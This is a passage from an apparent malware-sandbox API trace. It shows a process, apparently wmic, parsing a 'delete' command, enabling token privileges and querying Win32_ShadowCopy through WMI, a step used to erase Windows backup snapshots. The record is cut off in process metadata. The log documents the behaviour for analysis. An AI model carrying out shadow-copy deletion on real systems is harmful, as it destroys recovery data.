??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.782] lstrlenW (lpString="PATH") returned 4 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0211.782] lstrlenW (lpString="WHERE") returned 5 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0211.782] lstrlenW (lpString="(") returned 1 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0211.782] lstrlenW (lpString="/") returned 1 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0211.782] lstrlenW (lpString="-") returned 1 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0211.782] malloc (_Size=0x18) returned 0x52c8f0 [0211.782] lstrlenW (lpString="GET") returned 3 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0211.782] lstrlenW (lpString="LIST") returned 4 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0211.782] lstrlenW (lpString="SET") returned 3 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0211.782] lstrlenW (lpString="CREATE") returned 6 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0211.782] lstrlenW (lpString="CALL") returned 4 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0211.782] lstrlenW (lpString="ASSOC") returned 5 [0211.782] lstrlenW (lpString="delete") returned 6 [0211.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0211.783] lstrlenW (lpString="DELETE") returned 6 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0211.783] free (_Block=0x52c8f0) [0211.783] lstrlenW (lpString="/") returned 1 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0211.783] lstrlenW (lpString="-") returned 1 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] malloc (_Size=0xe) returned 0x52c8f0 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] lstrlenW (lpString="GET") returned 3 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0211.783] lstrlenW (lpString="LIST") returned 4 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0211.783] lstrlenW (lpString="SET") returned 3 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0211.783] lstrlenW (lpString="CREATE") returned 6 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0211.783] lstrlenW (lpString="CALL") returned 4 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0211.783] lstrlenW (lpString="ASSOC") returned 5 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0211.783] lstrlenW (lpString="DELETE") returned 6 [0211.783] lstrlenW (lpString="delete") returned 6 [0211.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0211.783] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0211.783] malloc (_Size=0x3e) returned 0x52caf0 [0211.783] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0211.783] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0211.784] malloc (_Size=0x18) returned 0x52c930 [0211.784] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0211.784] lstrlenW (lpString="FROM") returned 4 [0211.784] lstrlenW (lpString="*") returned 1 [0211.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0211.784] malloc (_Size=0x18) returned 0x52c8b0 [0211.784] free (_Block=0x52c930) [0211.784] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x54008300780008 | out: _String=0x0, _Context=0x54008300780008) returned="from" [0211.784] lstrlenW (lpString="FROM") returned 4 [0211.784] lstrlenW (lpString="from") returned 4 [0211.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0211.784] malloc (_Size=0x18) returned 0x52c930 [0211.784] free (_Block=0x52c8b0) [0211.784] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x54008400780008 | out: _String=0x0, _Context=0x54008400780008) returned="Win32_ShadowCopy" [0211.784] malloc (_Size=0x18) returned 0x52c8b0 [0211.784] free (_Block=0x52c930) [0211.784] free (_Block=0x52caf0) [0211.784] free (_Block=0x52c8b0) [0211.784] lstrlenW (lpString="SET") returned 3 [0211.784] lstrlenW (lpString="delete") returned 6 [0211.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0211.784] lstrlenW (lpString="CREATE") returned 6 [0211.784] lstrlenW (lpString="delete") returned 6 [0211.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0211.784] free (_Block=0x52c7f0) [0211.784] malloc (_Size=0x8) returned 0x526e20 [0211.784] lstrlenW (lpString="GET") returned 3 [0211.784] lstrlenW (lpString="delete") returned 6 [0211.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0211.784] lstrlenW (lpString="LIST") returned 4 [0211.784] lstrlenW (lpString="delete") returned 6 [0211.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0211.784] lstrlenW (lpString="ASSOC") returned 5 [0211.784] lstrlenW (lpString="delete") returned 6 [0211.784] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0211.784] WbemLocator:IUnknown:AddRef (This=0x1d31390) returned 0x3 [0211.785] free (_Block=0x17dfb0) [0211.785] lstrlenW (lpString="") returned 0 [0211.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0211.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0211.785] malloc (_Size=0x14) returned 0x52c7f0 [0211.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0211.785] GetCurrentThreadId () returned 0x628 [0211.785] GetCurrentProcess () returned 0xffffffffffffffff [0211.785] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f9e0 | out: TokenHandle=0x16f9e0*=0x28c) returned 1 [0211.785] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f9d8 | out: TokenInformation=0x0, ReturnLength=0x16f9d8) returned 0 [0211.785] malloc (_Size=0x118) returned 0x52caf0 [0211.785] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x3, TokenInformation=0x52caf0, TokenInformationLength=0x118, ReturnLength=0x16f9d8 | out: TokenInformation=0x52caf0, ReturnLength=0x16f9d8) returned 1 [0211.785] AdjustTokenPrivileges (in: TokenHandle=0x28c, DisableAllPrivileges=0, NewState=0x52caf0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1245404612, Attributes=0x6c2c), (Luid.LowPart=0x0, Luid.HighPart=1564592, Attributes=0x0), (Luid.LowPart=0x2e0073, Luid.HighPart=7471174, Attributes=0x650069), (Luid.LowPart=0x79006c, Luid.HighPart=6357070, Attributes=0x65006d), (Luid.LowPart=0x22, Luid.HighPart=989856568, Attributes=0x6c3b), (Luid.LowPart=0x0, Luid.HighPart=5402144, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0211.785] free (_Block=0x52caf0) [0211.785] CloseHandle (hObject=0x28c) returned 1 [0211.785] lstrlenW (lpString="GET") returned 3 [0211.785] lstrlenW (lpString="delete") returned 6 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0211.785] lstrlenW (lpString="LIST") returned 4 [0211.785] lstrlenW (lpString="delete") returned 6 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0211.785] lstrlenW (lpString="SET") returned 3 [0211.785] lstrlenW (lpString="delete") returned 6 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0211.785] lstrlenW (lpString="CALL") returned 4 [0211.785] lstrlenW (lpString="delete") returned 6 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0211.785] lstrlenW (lpString="ASSOC") returned 5 [0211.785] lstrlenW (lpString="delete") returned 6 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0211.785] lstrlenW (lpString="CREATE") returned 6 [0211.785] lstrlenW (lpString="delete") returned 6 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0211.785] lstrlenW (lpString="DELETE") returned 6 [0211.785] lstrlenW (lpString="delete") returned 6 [0211.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0211.786] malloc (_Size=0x18) returned 0x52c8b0 [0211.786] lstrlenA (lpString="") returned 0 [0211.786] malloc (_Size=0x2) returned 0x17dfb0 [0211.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff44314c, cbMultiByte=-1, lpWideCharStr=0x17dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0211.786] free (_Block=0x17dfb0) [0211.786] malloc (_Size=0x18) returned 0x52c930 [0211.786] lstrlenA (lpString="") returned 0 [0211.786] malloc (_Size=0x2) returned 0x17dfb0 [0211.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff44314c, cbMultiByte=-1, lpWideCharStr=0x17dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0211.786] free (_Block=0x17dfb0) [0211.786] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0211.786] malloc (_Size=0x3e) returned 0x52caf0 [0211.786] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0211.786] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0211.786] malloc (_Size=0x18) returned 0x52c9d0 [0211.786] free (_Block=0x52c930) [0211.786] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x54008800680007 | out: _String=0x0, _Context=0x54008800680007) returned="*" [0211.786] lstrlenW (lpString="FROM") returned 4 [0211.786] lstrlenW (lpString="*") returned 1 [0211.787] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0211.787] malloc (_Size=0x18) returned 0x52c930 [0211.787] free (_Block=0x52c9d0) [0211.787] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x54008900680007 | out: _String=0x0, _Context=0x54008900680007) returned="from" [0211.787] lstrlenW (lpString="FROM") returned 4 [0211.787] lstrlenW (lpString="from") returned 4 [0211.787] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0211.787] malloc (_Size=0x18) returned 0x52c9d0 [0211.787] free (_Block=0x52c930) [0211.787] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x54008a00680007 | out: _String=0x0, _Context=0x54008a00680007) returned="Win32_ShadowCopy" [0211.787] malloc (_Size=0x18) returned 0x52c930 [0211.787] free (_Block=0x52c9d0) [0211.787] free (_Block=0x52caf0) [0211.787] malloc (_Size=0x18) returned 0x52c9d0 [0211.787] malloc (_Size=0x18) returned 0x52c8d0 [0211.787] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0211.787] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0211.787] free (_Block=0x52c8b0) [0211.787] free (_Block=0x52c9d0) [0211.787] ??0CHString@@QEAA@XZ () returned 0x16f950 [0211.787] GetCurrentThreadId () returned 0x628 [0211.787] malloc (_Size=0x18) returned 0x52c9d0 [0211.787] malloc (_Size=0x18) returned 0x52c8b0 [0211.787] malloc (_Size=0x18) returned 0x52c950 [0211.787] malloc (_Size=0x18) returned 0x52c970 [0211.787] malloc (_Size=0x18) returned 0x52c990 [0211.787] SysStringLen (param_1="\\\\") returned 0x2 [0211.787] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0211.787] malloc (_Size=0x18) returned 0x52c9b0 [0211.788] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0211.788] SysStringLen (param_1="\\") returned 0x1 [0211.788] malloc (_Size=0x18) returned 0x52c9f0 [0211.788] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0211.788] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0211.788] free (_Block=0x52c9b0) [0211.788] free (_Block=0x52c990) [0211.788] free (_Block=0x52c970) [0211.788] free (_Block=0x52c950) [0211.788] free (_Block=0x52c8b0) [0211.788] free (_Block=0x52c9d0) [0211.788] malloc (_Size=0x18) returned 0x52c9d0 [0211.788] malloc (_Size=0x18) returned 0x52c8b0 [0211.788] malloc (_Size=0x18) returned 0x52c950 [0211.788] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d31390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4b29d0 | out: ppNamespace=0xff4b29d0*=0x1d43c18) returned 0x0 [0211.792] free (_Block=0x52c950) [0211.792] free (_Block=0x52c8b0) [0211.792] free (_Block=0x52c9d0) [0211.792] CoSetProxyBlanket (pProxy=0x1d43c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0211.793] free (_Block=0x52c9f0) [0211.793] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.793] ??0CHString@@QEAA@XZ () returned 0x16f8a0 [0211.793] GetCurrentThreadId () returned 0x628 [0211.793] malloc (_Size=0x18) returned 0x52c9f0 [0211.793] lstrlenA (lpString="") returned 0 [0211.793] malloc (_Size=0x2) returned 0x17dfb0 [0211.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff44314c, cbMultiByte=-1, lpWideCharStr=0x17dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0211.793] free (_Block=0x17dfb0) [0211.793] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0211.793] SysStringLen (param_1="") returned 0x0 [0211.793] free (_Block=0x52c9f0) [0211.793] malloc (_Size=0x18) returned 0x52c9f0 [0211.793] IWbemServices:ExecQuery (in: This=0x1d43c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x16f8a8 | out: ppEnum=0x16f8a8*=0x1d43d18) returned 0x0 [0212.689] free (_Block=0x52c9f0) [0212.689] CoSetProxyBlanket (pProxy=0x1d43d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0212.691] IEnumWbemClassObject:Next (in: This=0x1d43d18, lTimeout=-1, uCount=0x1, apObjects=0x16f8b0, puReturned=0x16f8c0 | out: apObjects=0x16f8b0*=0x0, puReturned=0x16f8c0*=0x0) returned 0x1 [0212.692] IUnknown:Release (This=0x1d43d18) returned 0x0 [0212.693] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0212.693] free (_Block=0x52c930) [0212.693] free (_Block=0x52c8d0) [0212.693] GetCurrentThreadId () returned 0x628 [0212.693] ??0CHString@@QEAA@PEBG@Z () returned 0x16fa88 [0212.693] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16fa88 [0212.693] malloc (_Size=0x800) returned 0x52cb70 [0212.693] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x52cb70, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0212.693] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0212.693] malloc (_Size=0x1c) returned 0x52caf0 [0212.693] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x52caf0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0212.693] fprintf (in: _File=0x7fefeeb2ab0, _Format="%s" | out: _File=0x7fefeeb2ab0) returned 27 [0212.694] fflush (in: _File=0x7fefeeb2ab0 | out: _File=0x7fefeeb2ab0) returned 0 [0212.694] free (_Block=0x52caf0) [0212.694] free (_Block=0x52cb70) [0212.694] ??1CHString@@QEAA@XZ () returned 0x753b5e01 [0212.694] WbemLocator:IUnknown:Release (This=0x1d43c18) returned 0x0 [0212.694] ?Empty@CHString@@QEAAXXZ () returned 0x7fef83e482c [0212.694] _kbhit () returned 0x0 [0212.695] free (_Block=0x526e20) [0212.695] free (_Block=0x52c7d0) [0212.695] free (_Block=0x52c7b0) [0212.695] free (_Block=0x52c790) [0212.695] free (_Block=0x52c770) [0212.695] free (_Block=0x526e90) [0212.695] free (_Block=0x52c870) [0212.696] free (_Block=0x528600) [0212.696] free (_Block=0x52c8f0) [0212.696] free (_Block=0x52ca70) [0212.696] free (_Block=0x52c890) [0212.696] free (_Block=0x52c910) [0212.696] free (_Block=0x526ec0) [0212.696] free (_Block=0x526d00) [0212.696] free (_Block=0x52cac0) [0212.696] ?Empty@CHString@@QEAAXXZ () returned 0x7fef83e482c [0212.696] free (_Block=0x52ca40) [0212.696] free (_Block=0x52c810) [0212.696] free (_Block=0x52c830) [0212.696] free (_Block=0x5263e0) [0212.696] free (_Block=0x526430) [0212.696] free (_Block=0x526480) [0212.696] free (_Block=0x52c7f0) [0212.696] free (_Block=0x526520) [0212.696] free (_Block=0x526ce0) [0212.696] free (_Block=0x528040) [0212.696] free (_Block=0x5268c0) [0212.696] free (_Block=0x528000) [0212.696] free (_Block=0x526860) [0212.696] free (_Block=0x526880) [0212.696] free (_Block=0x526740) [0212.696] free (_Block=0x526760) [0212.696] free (_Block=0x5266e0) [0212.696] free (_Block=0x526700) [0212.696] free (_Block=0x5267a0) [0212.696] free (_Block=0x5267c0) [0212.696] free (_Block=0x526800) [0212.696] free (_Block=0x526820) [0212.696] free (_Block=0x526620) [0212.696] free (_Block=0x526640) [0212.696] free (_Block=0x5265c0) [0212.696] free (_Block=0x5265e0) [0212.696] free (_Block=0x526680) [0212.696] free (_Block=0x5266a0) [0212.696] free (_Block=0x526560) [0212.697] free (_Block=0x526580) [0212.697] free (_Block=0x5264d0) [0212.697] free (_Block=0x527f90) [0212.697] free (_Block=0x526d90) [0212.697] WbemLocator:IUnknown:Release (This=0x1d31390) returned 0x2 [0212.697] WbemLocator:IUnknown:Release (This=0x1d43b28) returned 0x0 [0212.697] WbemLocator:IUnknown:Release (This=0x1d43a98) returned 0x0 [0212.698] WbemLocator:IUnknown:Release (This=0x1d31390) returned 0x1 [0212.698] ?Empty@CHString@@QEAAXXZ () returned 0x7fef83e482c [0212.698] WbemLocator:IUnknown:Release (This=0x1d31390) returned 0x0 [0212.698] free (_Block=0x52c6f0) [0212.698] free (_Block=0x52c710) [0212.698] free (_Block=0x528540) [0212.698] free (_Block=0x52c730) [0212.698] free (_Block=0x52c750) [0212.698] free (_Block=0x528580) [0212.698] free (_Block=0x52c570) [0212.698] free (_Block=0x52c590) [0212.698] free (_Block=0x5283c0) [0212.698] free (_Block=0x52c5b0) [0212.698] free (_Block=0x52c5d0) [0212.698] free (_Block=0x528400) [0212.698] free (_Block=0x52c4f0) [0212.699] free (_Block=0x52c510) [0212.699] free (_Block=0x528340) [0212.699] free (_Block=0x52c530) [0212.699] free (_Block=0x52c550) [0212.699] free (_Block=0x528380) [0212.699] free (_Block=0x52c670) [0212.699] free (_Block=0x52c690) [0212.699] free (_Block=0x5284c0) [0212.699] free (_Block=0x52c6b0) [0212.699] free (_Block=0x52c6d0) [0212.699] free (_Block=0x528500) [0212.699] free (_Block=0x52c470) [0212.699] free (_Block=0x52c490) [0212.699] free (_Block=0x5282c0) [0212.699] free (_Block=0x52c4b0) [0212.699] free (_Block=0x52c4d0) [0212.699] free (_Block=0x528300) [0212.699] free (_Block=0x52c5f0) [0212.699] free (_Block=0x52c610) [0212.699] free (_Block=0x528440) [0212.699] free (_Block=0x52c630) [0212.699] free (_Block=0x52c650) [0212.699] free (_Block=0x528480) [0212.699] free (_Block=0x52c3b0) [0212.699] free (_Block=0x52c3d0) [0212.699] free (_Block=0x528200) [0212.699] free (_Block=0x52c270) [0212.700] free (_Block=0x52c290) [0212.700] free (_Block=0x5280c0) [0212.700] free (_Block=0x526d50) [0212.700] free (_Block=0x526d70) [0212.700] free (_Block=0x528080) [0212.700] free (_Block=0x52c2f0) [0212.700] free (_Block=0x52c310) [0212.700] free (_Block=0x528140) [0212.700] free (_Block=0x52c3f0) [0212.700] free (_Block=0x52c410) [0212.700] free (_Block=0x528240) [0212.700] free (_Block=0x52c2b0) [0212.700] free (_Block=0x52c2d0) [0212.700] free (_Block=0x528100) [0212.700] free (_Block=0x52c330) [0212.700] free (_Block=0x52c350) [0212.700] free (_Block=0x528180) [0212.700] free (_Block=0x52c370) [0212.701] free (_Block=0x52c390) [0212.701] free (_Block=0x5281c0) [0212.701] free (_Block=0x52c430) [0212.701] free (_Block=0x52c450) [0212.701] free (_Block=0x528280) [0212.701] CoUninitialize () [0212.736] exit (_Code=0) [0212.736] free (_Block=0x5285c0) [0212.736] free (_Block=0x527c20) [0212.736] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0212.736] free (_Block=0x526e40) [0212.736] free (_Block=0x526540) [0212.736] free (_Block=0x527be0) [0212.736] free (_Block=0x527ba0) [0212.736] free (_Block=0x527b50) [0212.736] free (_Block=0x527b10) [0212.736] free (_Block=0x527ab0) [0212.736] free (_Block=0x525a90) [0212.736] free (_Block=0x525a50) [0212.736] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0212.736] free (_Block=0x52c850) Thread: id = 157 os_tid = 0x658 Thread: id = 158 os_tid = 0x118 Thread: id = 159 os_tid = 0x3cc Thread: id = 160 os_tid = 0x6b4 Thread: id = 161 os_tid = 0x760 Process: id = "25" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x251df000" os_pid = "0x378" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "24" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cccb" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 162 os_tid = 0x7cc Thread: id = 163 os_tid = 0x69c Thread: id = 164 os_tid = 0x4fc Thread: id = 165 os_tid = 0x5d4 Thread: id = 166 os_tid = 0x32c Thread: id = 167 os_tid = 0x27c Thread: id = 168 os_tid = 0x59c Thread: id = 169 os_tid = 0x560 Thread: id = 170 os_tid = 0x188 Thread: id = 171 os_tid = 0x58c Thread: id = 172 os_tid = 0x258 Thread: id = 173 os_tid = 0x214 Thread: id = 174 os_tid = 0x7c0 Thread: id = 175 os_tid = 0x564 Thread: id = 176 os_tid = 0x780 Thread: id = 177 